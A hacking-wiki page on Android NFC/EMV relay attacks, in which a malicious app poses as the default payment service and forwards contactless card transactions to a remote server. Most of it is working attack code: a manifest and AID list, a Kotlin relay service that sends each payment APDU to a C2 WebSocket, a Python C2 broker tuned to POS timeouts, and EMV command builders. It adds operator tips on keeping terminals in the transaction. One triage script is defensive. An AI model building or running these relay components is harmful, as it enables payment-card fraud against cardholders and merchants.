Android HCE NFC/EMV Relay Attacks
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Overview
Abusing Android Host Card Emulation (HCE) lets a malicious app that has been set as the default NFC payment service relay EMV contactless transactions in real time. The POS terminal talks ISO 14443-4/EMV to the phone; the app's HostApduService receives each APDU and forwards it over a bidirectional C2 channel (often a WebSocket) to a backend that assembles the response, which is then relayed back to the POS. This yields live card emulation with no card data stored on the phone. Campaigns observed at scale rebrand themselves as banking/government apps, ask the user to make them the default payment app, and automatically exfiltrate device/card data to Telegram bots/channels.
Key traits
- Android components: HostApduService + default NFC payment handler (category "payment")
- Transport/C2: WebSocket for the APDU relay; Telegram bot API for exfil/ops
- Operator workflow: structured commands (login, register_device, apdu_command/apdu_response, get_pin/pin_response, paired, check_status, update_required, telegram_notification, error)
- Roles: scanner (reads EMV data from a card) vs tapper (HCE/relay) builds
Minimal implementation building blocks
Manifest (become the default payment HCE service)
```xml
<uses-feature android:name="android.hardware.nfc.hce" android:required="true"/>
<uses-permission android:name="android.permission.NFC"/>
<application ...>
    <service
        android:name=".EmvRelayService"
        android:exported="true"
        android:permission="android.permission.BIND_NFC_SERVICE">
        <intent-filter>
            <action android:name="android.nfc.cardemulation.action.HOST_APDU_SERVICE"/>
        </intent-filter>
        <meta-data
            android:name="android.nfc.cardemulation.host_apdu_service"
            android:resource="@xml/aid_list"/>
    </service>
</application>
```
Example AID list with the EMV payment category (Android routes AIDs in a "payment" group only to the app currently set as the default payment application, so the service gets no APDUs until the user makes the switch):
```xml
<?xml version="1.0" encoding="utf-8"?>
<host-apdu-service xmlns:android="http://schemas.android.com/apk/res/android"
    android:description="@string/app_name"
    android:requireDeviceUnlock="false">
    <aid-group android:category="payment" android:description="@string/app_name">
        <!-- PPSE (2PAY.SYS.DDF01) routing -->
        <aid-filter android:name="325041592E5359532E4444463031"/>
        <!-- Common EMV AIDs (examples): -->
        <aid-filter android:name="A0000000031010"/> <!-- VISA credit/debit -->
        <aid-filter android:name="A0000000041010"/> <!-- MasterCard -->
        <aid-filter android:name="A00000002501"/> <!-- AmEx -->
    </aid-group>
</host-apdu-service>
```
Ask the user to set the app as the default payment app (opens the OS settings screen; the string is `Settings.ACTION_NFC_PAYMENT_SETTINGS`):
```kotlin
val intent = Intent("android.settings.NFC_PAYMENT_SETTINGS")
startActivity(intent)
```
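A defender-side complement to the three building blocks above: a static triage script that reads a decoded AndroidManifest.xml and the referenced host-apdu-service resource and flags the combination that characterises a relay build (payment-category AID group, PPSE AID, `requireDeviceUnlock="false"`, INTERNET permission). This is an added example, not code from the page or from the Zimperium report; the sample XML is constructed from the snippets above and the scoring heuristic is an assumption of this example, not a published detection rule.

```python
# Added triage example (not from the page): flags an APK whose decoded manifest and
# HCE AID resource match the relay-app shape described above. The sample XML is
# constructed from the manifest/aid_list snippets on this page; the heuristic is ours.
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace
HCE_ACTION = "android.nfc.cardemulation.action.HOST_APDU_SERVICE"
HCE_META = "android.nfc.cardemulation.host_apdu_service"
PPSE_AID = "325041592E5359532E4444463031"           # 2PAY.SYS.DDF01


def hce_services(manifest_xml: str) -> list:
    """Every <service> handling HOST_APDU_SERVICE, with its bind permission and AID resource."""
    out = []
    for svc in ET.fromstring(manifest_xml).iter("service"):
        actions = {a.get(A + "name") for a in svc.iter("action")}
        if HCE_ACTION not in actions:
            continue
        meta = {m.get(A + "name"): m.get(A + "resource") for m in svc.iter("meta-data")}
        out.append({
            "name": svc.get(A + "name"),
            "exported": svc.get(A + "exported") == "true",
            "bind_permission": svc.get(A + "permission"),
            "aid_resource": meta.get(HCE_META),
        })
    return out


def permissions(manifest_xml: str) -> set:
    """All <uses-permission> names declared in the manifest."""
    return {p.get(A + "name") for p in ET.fromstring(manifest_xml).iter("uses-permission")}


def aid_groups(aid_list_xml: str) -> tuple:
    """(requireDeviceUnlock, [{category, aids}]) parsed from the host-apdu-service resource."""
    root = ET.fromstring(aid_list_xml)
    unlock = root.get(A + "requireDeviceUnlock", "false").lower() == "true"
    groups = [{"category": g.get(A + "category"),
               "aids": [f.get(A + "name").upper() for f in g.iter("aid-filter")]}
              for g in root.iter("aid-group")]
    return unlock, groups


def triage(manifest_xml: str, aid_list_xml: str) -> list:
    """Human-readable findings; an empty list means no HCE service is declared at all."""
    services = hce_services(manifest_xml)
    if not services:
        return []
    findings = []
    unlock, groups = aid_groups(aid_list_xml)
    payment = [g for g in groups if g["category"] == "payment"]
    if payment:
        findings.append("payment-category AID group: served only once the app is the default payment app")
    if any(PPSE_AID in g["aids"] for g in groups):
        findings.append("registers the PPSE AID: will answer SELECT 2PAY.SYS.DDF01 from any POS")
    if payment and not unlock:
        findings.append("requireDeviceUnlock=false: emulates while the screen is locked")
    if "android.permission.INTERNET" in permissions(manifest_xml):
        findings.append("INTERNET permission: APDUs can leave the device (relay/C2)")
    for s in services:
        if s["exported"] and s["bind_permission"] != "android.permission.BIND_NFC_SERVICE":
            findings.append(f"{s['name']}: exported without BIND_NFC_SERVICE, any app can bind it")
    return findings


# Constructed sample input mirroring the snippets on this page (not a real APK).
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-permission android:name="android.permission.NFC"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application>
    <service android:name=".EmvRelayService" android:exported="true"
             android:permission="android.permission.BIND_NFC_SERVICE">
      <intent-filter>
        <action android:name="android.nfc.cardemulation.action.HOST_APDU_SERVICE"/>
      </intent-filter>
      <meta-data android:name="android.nfc.cardemulation.host_apdu_service"
                 android:resource="@xml/aid_list"/>
    </service>
  </application>
</manifest>"""

SAMPLE_AID_LIST = """<host-apdu-service xmlns:android="http://schemas.android.com/apk/res/android"
    android:description="relay" android:requireDeviceUnlock="false">
  <aid-group android:category="payment" android:description="relay">
    <aid-filter android:name="325041592E5359532E4444463031"/>
    <aid-filter android:name="A0000000031010"/>
    <aid-filter android:name="A0000000041010"/>
  </aid-group>
</host-apdu-service>"""

if __name__ == "__main__":
    for line in triage(SAMPLE_MANIFEST, SAMPLE_AID_LIST):
        print("-", line)
```

Run it against the output of `apktool d` (the decoded `AndroidManifest.xml` and `res/xml/<aid resource>.xml`); a legitimate wallet will also trip the first three findings, so treat the list as a reason to look at the app's network behaviour, not as a verdict.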
HostApduService relay skeleton
```kotlin
import android.nfc.cardemulation.HostApduService
import android.os.Bundle
import java.util.concurrent.CompletableFuture
import java.util.concurrent.ConcurrentHashMap
import java.util.concurrent.TimeUnit
import okhttp3.OkHttpClient
import okhttp3.Request
import okhttp3.WebSocket
import okhttp3.WebSocketListener
import org.json.JSONObject

class EmvRelayService : HostApduService() {
    private var ws: WebSocket? = null
    // apdu_command ids still waiting for their apdu_response from the C2
    private val pending = ConcurrentHashMap<Long, CompletableFuture<String>>()

    override fun onCreate() {
        super.onCreate()
        // Establish the C2 WebSocket early; authenticate and register the device here
        val client = OkHttpClient()
        val req = Request.Builder().url("wss://c2.example/ws").build()
        ws = client.newWebSocket(req, object : WebSocketListener() {
            override fun onMessage(webSocket: WebSocket, text: String) {
                val msg = JSONObject(text)
                if (msg.optString("type") == "apdu_response") {
                    pending.remove(msg.getLong("id"))?.complete(msg.getString("data"))
                }
            }
        })
    }

    override fun processCommandApdu(commandApdu: ByteArray?, extras: Bundle?): ByteArray {
        // Marshal the APDU to the C2 and block until the matching apdu_response arrives.
        // (The non-blocking alternative is to return null here and call sendResponseApdu() later.)
        val id = System.nanoTime()
        val msg = JSONObject().put("type", "apdu_command").put("id", id).put("data", commandApdu!!.toHex())
        return sendAndAwait(id, msg.toString()).hexToBytes()
    }

    override fun onDeactivated(reason: Int) {
        // DEACTIVATION_LINK_LOSS or DEACTIVATION_DESELECTED: the tap is over
        ws?.send("{\"type\":\"card_removed\"}")
    }

    private fun sendAndAwait(id: Long, json: String): String {
        val future = CompletableFuture<String>()
        pending[id] = future
        ws?.send(json)
        return try {
            future.get(500, TimeUnit.MILLISECONDS) // correlation + timeout: stay inside the POS per-APDU budget
        } catch (e: Exception) {
            pending.remove(id) // timeout, error or blocked status from the C2
            "9000" // fall back to SW success if needed
        }
    }

    private fun ByteArray.toHex() = joinToString("") { "%02X".format(it) }
    private fun String.hexToBytes() = chunked(2).map { it.toInt(16).toByte() }.toByteArray()
}
```
Practical note: the service must answer each APDU within the POS timeout budget (roughly a few hundred ms), so keep a low-latency socket open and authenticate to the C2 before the tap rather than during it. Survive process death by running as a foreground service where needed.
Typical C2 command set (observed)
- login / login_response
- register / register_device / register_response
- logout
- apdu_command / apdu_response
- card_info / clear_card_info / card_removed
- get_pin / pin_response
- check_status / status_response
- paired / unpaired
- update_required
- telegram_notification / telegram_response
- error
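The server side of the `apdu_command` / `apdu_response` pair, as an added example (not code from the page or from any observed C2): a broker that correlates each command id with its answer and enforces the per-APDU deadline from the practical note above, so a slow or missing card-side reply cannot stall the POS. The JSON field names follow the command names listed here; the 500 ms budget and the fallback status word are assumptions of this example.

```python
# Added example (not from the page): C2-side correlation of apdu_command / apdu_response.
# The tapper (phone at the POS) calls submit(); whoever answers for the card (scanner
# build, operator UI or synthetic-card backend) calls deliver(). Each id gets one slot
# and one deadline. Message shapes and timings are assumptions of this example.
import json
import threading
import time


class RelayBroker:
    def __init__(self, timeout_s: float = 0.5, fallback_sw: str = "6F00"):
        self.timeout_s = timeout_s
        self.fallback_sw = fallback_sw   # SW returned to the tapper when the deadline passes
        self._pending = {}               # id -> (Event, [response data])
        self._lock = threading.Lock()
        self.log = []                    # (id, elapsed_ms, timed_out) per relayed APDU

    def submit(self, apdu_command_json: str) -> str:
        """Block on behalf of the tapper until the matching apdu_response or the deadline."""
        msg = json.loads(apdu_command_json)
        if msg.get("type") != "apdu_command":
            return json.dumps({"type": "error", "reason": "expected apdu_command"})
        cid, event, slot = msg["id"], threading.Event(), [None]
        with self._lock:
            self._pending[cid] = (event, slot)
        t0 = time.monotonic()
        answered = event.wait(self.timeout_s)
        with self._lock:
            self._pending.pop(cid, None)   # late answers for this id are dropped from now on
        self.log.append((cid, round((time.monotonic() - t0) * 1000), not answered))
        data = slot[0] if answered else self.fallback_sw
        return json.dumps({"type": "apdu_response", "id": cid, "data": data})

    def deliver(self, apdu_response_json: str) -> bool:
        """Card side answers; False means the id is unknown or already timed out."""
        msg = json.loads(apdu_response_json)
        if msg.get("type") != "apdu_response":
            return False
        with self._lock:
            entry = self._pending.get(msg["id"])
        if entry is None:
            return False
        event, slot = entry
        slot[0] = msg["data"]
        event.set()
        return True


# Constructed messages: SELECT PPSE from the POS and a minimal FCI + SW 9000 as the answer.
SAMPLE_COMMAND = json.dumps({"type": "apdu_command", "id": 1,
                             "data": "00A404000E325041592E5359532E444446303100"})
SAMPLE_RESPONSE = json.dumps({"type": "apdu_response", "id": 1,
                              "data": "6F10840E325041592E5359532E44444630319000"})


def demo_round_trip(card_delay_s: float, timeout_s: float = 0.5) -> dict:
    """Relay one APDU with the card side answering after card_delay_s; shows both outcomes."""
    broker = RelayBroker(timeout_s=timeout_s)
    delivered = [False]

    def card_side():
        time.sleep(card_delay_s)
        delivered[0] = broker.deliver(SAMPLE_RESPONSE)

    worker = threading.Thread(target=card_side)
    worker.start()
    resp = json.loads(broker.submit(SAMPLE_COMMAND))
    worker.join()
    return {"data": resp["data"], "delivered": delivered[0], "timed_out": broker.log[-1][2]}


if __name__ == "__main__":
    print(demo_round_trip(0.05))              # answered inside the budget
    print(demo_round_trip(0.6, timeout_s=0.2))  # card side too slow: fallback SW
```

The fallback here is SW 6F00 rather than the 9000 used in the phone-side skeleton above, so the terminal sees an explicit error instead of an empty success response; which one keeps a given terminal in the transaction longer is terminal-specific and worth measuring rather than assuming.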
EMV contactless exchange (primer)
The POS drives the flow; the HCE app just passes the APDUs through:
- SELECT PPSE (2PAY.SYS.DDF01)
  - 00 A4 04 00 0E 32 50 41 59 2E 53 59 53 2E 44 44 46 30 31 00
- SELECT application AID (e.g., VISA A0000000031010)
  - 00 A4 04 00 <len> <AID> 00
- GET PROCESSING OPTIONS (GPO)
  - 80 A8 00 00 <Lc> 83 <len> <PDOL data> 00
- READ RECORD(S) per AFL
  - 00 B2 <record> <(SFI<<3)|04> 00 (e.g. 00 B2 01 0C 00 reads record 1 of SFI 1)
- GENERATE AC (ARQC/TC)
  - 80 AE <P1> 00 <Lc> <CDOL1 data> 00 (P1 = 80 requests an ARQC, 40 a TC, 00 an AAC)
In a relay the backend crafts valid FCI/FCP, AFL, records and a cryptogram; the phone only forwards bytes.
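The exchange above, worked in code as an added example (not from the page): the POS-side command builders, a BER-TLV parser for the card-side responses the relay backend has to fabricate, and the AFL expansion into READ RECORD commands. It goes slightly beyond the list by handling both GPO response formats (tag 80 and tag 77). The sample FCI and GPO responses are constructed for illustration, not captured from a card, and the CDOL1 data passed to GENERATE AC is a placeholder.

```python
# Added example (not from the page): POS-side EMV contactless C-APDUs and parsing of
# the R-APDUs a relay backend must produce. Sample responses are constructed, not real.

PPSE_AID = bytes.fromhex("325041592E5359532E4444463031")  # "2PAY.SYS.DDF01"


def parse_tlv(data: bytes) -> list:
    """BER-TLV -> [(tag_bytes, value)], recursing into constructed tags (bit 6 of the first tag byte).

    Handles multi-byte tags (9F38, BF0C, ...) and long-form lengths (81 xx / 82 xx xx).
    """
    out, i = [], 0
    while i < len(data):
        if data[i] in (0x00, 0xFF):        # inter-TLV padding
            i += 1
            continue
        start = i
        i += 1
        if data[start] & 0x1F == 0x1F:     # more tag bytes while bit 8 is set
            while data[i] & 0x80:
                i += 1
            i += 1
        tag = data[start:i]
        length = data[i]
        i += 1
        if length & 0x80:
            n = length & 0x7F
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        value = data[i:i + length]
        i += length
        out.append((tag, parse_tlv(value) if tag[0] & 0x20 else value))
    return out


def find_tags(tlvs: list, tag: bytes) -> list:
    """Depth-first search returning every value carried under `tag`."""
    found = []
    for t, v in tlvs:
        if t == tag:
            found.append(v)
        if isinstance(v, list):
            found.extend(find_tags(v, tag))
    return found


# --- Command APDUs the POS sends (CLA INS P1 P2 Lc data Le) ---

def build_select(aid: bytes) -> bytes:
    """SELECT by name (P1=04): same shape for the PPSE and for the application AID."""
    return bytes([0x00, 0xA4, 0x04, 0x00, len(aid)]) + aid + b"\x00"


def build_gpo(pdol_data: bytes = b"") -> bytes:
    """GET PROCESSING OPTIONS; the PDOL-requested terminal data travels inside tag 83."""
    body = b"\x83" + bytes([len(pdol_data)]) + pdol_data
    return bytes([0x80, 0xA8, 0x00, 0x00, len(body)]) + body + b"\x00"


def build_generate_ac(cdol1_data: bytes, cryptogram: str = "ARQC") -> bytes:
    """GENERATE AC; P1 encodes the cryptogram type the terminal is asking for."""
    p1 = {"AAC": 0x00, "TC": 0x40, "ARQC": 0x80}[cryptogram]
    return bytes([0x80, 0xAE, p1, 0x00, len(cdol1_data)]) + cdol1_data + b"\x00"


# --- Card-side responses (what the relay backend has to craft) ---

def ppse_aids(fci: bytes) -> list:
    """ADF names (tag 4F) advertised in the PPSE FCI template 6F / A5 / BF0C / 61."""
    return find_tags(parse_tlv(fci), b"\x4F")


def parse_gpo_response(resp: bytes) -> tuple:
    """(AIP, AFL) from format 1 (tag 80: AIP||AFL) or format 2 (tag 77 with 82 and 94)."""
    tag, value = parse_tlv(resp)[0]
    if tag == b"\x80":
        return value[:2], value[2:]
    if tag == b"\x77":
        return find_tags(value, b"\x82")[0], find_tags(value, b"\x94")[0]
    raise ValueError(f"unexpected GPO response tag {tag.hex()}")


def afl_to_read_records(afl: bytes) -> list:
    """Expand 4-byte AFL entries (SFI<<3, first, last, #ODA records) into READ RECORD APDUs.

    READ RECORD is 00 B2 <record> <(SFI<<3)|04> 00; the 0x04 in P2 means P1 is a record number.
    """
    cmds = []
    for i in range(0, len(afl), 4):
        sfi, first, last = afl[i] >> 3, afl[i + 1], afl[i + 2]
        for rec in range(first, last + 1):
            cmds.append(bytes([0x00, 0xB2, rec, (sfi << 3) | 0x04, 0x00]))
    return cmds


# Constructed sample responses (illustrative values, not a real card).
SAMPLE_PPSE_FCI = bytes.fromhex("6F23840E325041592E5359532E4444463031"
                                "A511BF0C0E610C4F07A0000000031010870101")
SAMPLE_GPO_FORMAT1 = bytes.fromhex("800A3C00" "08010100" "10010301")
SAMPLE_GPO_FORMAT2 = bytes.fromhex("770E82023C00" "9408" "08010100" "10010301")


def pos_command_sequence(fci: bytes, gpo_resp: bytes) -> list:
    """SELECT PPSE -> SELECT first AID -> GPO -> READ RECORDs per AFL -> GENERATE AC (ARQC)."""
    cmds = [build_select(PPSE_AID), build_select(ppse_aids(fci)[0]), build_gpo()]
    _aip, afl = parse_gpo_response(gpo_resp)
    cmds.extend(afl_to_read_records(afl))
    cmds.append(build_generate_ac(b"\x00" * 8))   # placeholder CDOL1 data
    return cmds


if __name__ == "__main__":
    for c in pos_command_sequence(SAMPLE_PPSE_FCI, SAMPLE_GPO_FORMAT1):
        print(c.hex().upper())
```

Feeding the sequence to a real card through pyscard or to the relay backend and diffing the R-APDUs is the quickest way to see which fields (AIP, AFL, the 9F26 cryptogram) the backend has to get byte-exact for the terminal to proceed to GENERATE AC.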
Operator workflow observed in the field
- Deception + install: the app is disguised as a banking/government portal, shows a full-screen WebView and immediately asks to become the default NFC payment app.
- Event-triggered activation: an NFC tap wakes the HostApduService; the relay starts.
- Scanner/Tapper roles: one build reads EMV data from a victim card (PAN, expiry, tracks, device/EMV fields) and exfiltrates it; another build (or the same device later) performs the HCE relay to a POS.
- Exfiltration: device/card data is auto-posted to private Telegram channels/bots; the WebSocket coordinates sessions and UI prompts (e.g. an on-device PIN UI).
References
- Zimperium – Tap-and-Steal: The Rise of NFC Relay Malware on Mobile Devices
- Android HostApduService
- Android HCE and Card Emulation docs
- Zimperium IOCs – 2025-10-NFCStealer